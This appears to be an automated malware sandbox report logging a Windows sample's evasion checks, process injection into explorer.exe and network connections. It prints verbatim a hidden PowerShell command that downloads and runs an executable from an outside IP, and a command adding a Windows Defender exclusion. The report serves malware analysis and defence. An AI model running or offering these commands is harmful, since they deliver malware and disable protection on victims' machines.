                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                            Malware Analysis System Evasion

                            barindex
                            Tries to evade debugger and weak emulator (self modifying code)
                            Source: C:\Users\user\AppData\Local\Temp\file.exeSpecial instruction interceptor: First address: 7FF72809198E instructions caused by: Self-modifying code
                            Source: C:\ProgramData\explorers\explorers.exeSpecial instruction interceptor: First address: 7FF74B37198E instructions caused by: Self-modifying code
                            Source: C:\Windows\explorer.exeSpecial instruction interceptor: First address: 32F198E instructions caused by: Self-modifying code
                            Source: C:\ProgramData\explorers\explorers.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4770Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5097Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6550Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2962Jump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeWindow / User API: threadDelayed 1256Jump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeWindow / User API: threadDelayed 1297Jump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeWindow / User API: threadDelayed 1223Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5842
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1706
                            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1230Jump to behavior
                            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1206Jump to behavior
                            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1263Jump to behavior
                            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1227Jump to behavior
                            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1243Jump to behavior
                            Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_14-4450
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 372Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5900Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624Thread sleep count: 6550 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892Thread sleep count: 2962 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2996Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exe TID: 1840Thread sleep count: 1256 > 30Jump to behavior
                            Source: C:\ProgramData\explorers\explorers.exe TID: 1840Thread sleep time: -2513256s >= -30000sJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exe TID: 760Thread sleep count: 1297 > 30Jump to behavior
                            Source: C:\ProgramData\explorers\explorers.exe TID: 760Thread sleep time: -2595297s >= -30000sJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exe TID: 600Thread sleep count: 1223 > 30Jump to behavior
                            Source: C:\ProgramData\explorers\explorers.exe TID: 600Thread sleep time: -2447223s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3108Thread sleep count: 5842 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3960Thread sleep time: -5534023222112862s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3108Thread sleep count: 1706 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4024Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\explorer.exe TID: 4668Thread sleep count: 1230 > 30Jump to behavior
                            Source: C:\Windows\explorer.exe TID: 4668Thread sleep time: -2461230s >= -30000sJump to behavior
                            Source: C:\Windows\explorer.exe TID: 2232Thread sleep count: 1206 > 30Jump to behavior
                            Source: C:\Windows\explorer.exe TID: 2232Thread sleep time: -2413206s >= -30000sJump to behavior
                            Source: C:\Windows\explorer.exe TID: 3588Thread sleep count: 1263 > 30Jump to behavior
                            Source: C:\Windows\explorer.exe TID: 3588Thread sleep time: -2527263s >= -30000sJump to behavior
                            Source: C:\Windows\explorer.exe TID: 5024Thread sleep count: 1227 > 30Jump to behavior
                            Source: C:\Windows\explorer.exe TID: 5024Thread sleep time: -2455227s >= -30000sJump to behavior
                            Source: C:\Windows\explorer.exe TID: 8068Thread sleep count: 1243 > 30Jump to behavior
                            Source: C:\Windows\explorer.exe TID: 8068Thread sleep time: -2487243s >= -30000sJump to behavior
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\ProgramData\explorers\explorers.exeLast function: Thread delayed
                            Source: C:\ProgramData\explorers\explorers.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                            Source: powershell.exe, 00000000.00000002.1517594123.0000025AE8AE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{
                            Source: file.exe, 00000003.00000002.1485286903.000000000106C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllN
                            Source: explorer.exe, 0000000E.00000003.1510261915.0000000001564000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: explorers.exe, 00000007.00000002.3813152495.000000000060B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.1512676422.0000000001564000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.1513189809.0000000001564000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.1512927118.0000000001564000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3813509553.0000000001562000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.1513064824.0000000001564000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess queried: DebugObjectHandleJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess queried: DebugPortJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeProcess queried: DebugPortJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeProcess queried: DebugObjectHandleJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Windows\explorer.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Windows\explorer.exeProcess queried: DebugObjectHandleJump to behavior
                            Source: C:\Windows\explorer.exeProcess queried: DebugPortJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeProcess queried: DebugPortJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeProcess queried: DebugObjectHandleJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            System process connects to network (likely due to code injection or exploit)
                            Source: C:\Windows\explorer.exeNetwork Connect: 87.121.86.214 3441Jump to behavior
                            Adds a directory exclusion to Windows Defender
                            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers'
                            Source: C:\ProgramData\explorers\explorers.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers'
                            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers'Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers'Jump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers'Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers'Jump to behavior
                            Found direct / indirect Syscall (likely to bypass EDR)
                            Source: C:\Users\user\AppData\Local\Temp\file.exeNtQueryInformationProcess: Indirect: 0x7FF728066CC8Jump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeNtQueryInformationProcess: Indirect: 0x7FF74B346CC8Jump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeNtQuerySystemInformation: Indirect: 0x7FF74B33CD2CJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeNtQueryInformationProcess: Indirect: 0x7FF728066E04Jump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeNtQueryInformationProcess: Indirect: 0x7FF74B346E04Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeNtQuerySystemInformation: Indirect: 0x7FF72805CD2CJump to behavior
                            Maps a DLL or memory area into another process
                            Source: C:\ProgramData\explorers\explorers.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\file.exe "C:\Users\user\AppData\Local\Temp\file.exe" Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers'Jump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers'Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c start "" "C:\ProgramData\explorers\explorers.exe" {8C297CC8-E374-4152-AC22-8BDCBA90B505}Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\explorers\explorers.exe "C:\ProgramData\explorers\explorers.exe" {8C297CC8-E374-4152-AC22-8BDCBA90B505}Jump to behavior
                            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -command "& { invoke-webrequest -uri http://87.120.113.91/image.exe -outfile c:\users\user\appdata\local\temp\file.exe; start-process 'c:\users\user\appdata\local\temp\file.exe' }"
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
